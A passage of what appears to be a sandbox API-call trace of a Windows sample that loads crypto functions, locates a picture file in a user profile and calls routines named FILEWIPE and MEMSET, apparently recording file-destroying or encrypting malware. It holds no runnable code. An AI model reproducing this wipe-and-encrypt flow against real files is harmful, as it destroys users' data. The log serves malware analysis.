hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.232] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0190.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.233] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0190.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.234] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0190.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x90d420, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0190.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0190.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.236] GetProcAddress (hModule=0x74f20000, lpProcName="CryptReleaseContext") returned 0x74f2e124 [0190.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0190.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0190.236] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0190.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0190.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.238] FreeLibrary (hLibModule=0x74f20000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0190.241] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0190.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0190.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.242] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d69370, ftCreationTime.dwHighDateTime=0x1d5d92b, ftLastAccessTime.dwLowDateTime=0xa1f44280, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0xa1f44280, ftLastWriteTime.dwHighDateTime=0x1d5e558, nFileSizeHigh=0x0, nFileSizeLow=0x4969, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uPfzg.bmp", cAlternateFileName="")) returned 0x90ae18 [0190.242] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0190.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.242] CharLowerBuffW (in: lpsz="byte[18793]", cchLength=0xb | out: lpsz="byte[18793]") returned 0xb [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4969) returned 0x8fff00 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0190.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.244] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.244] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 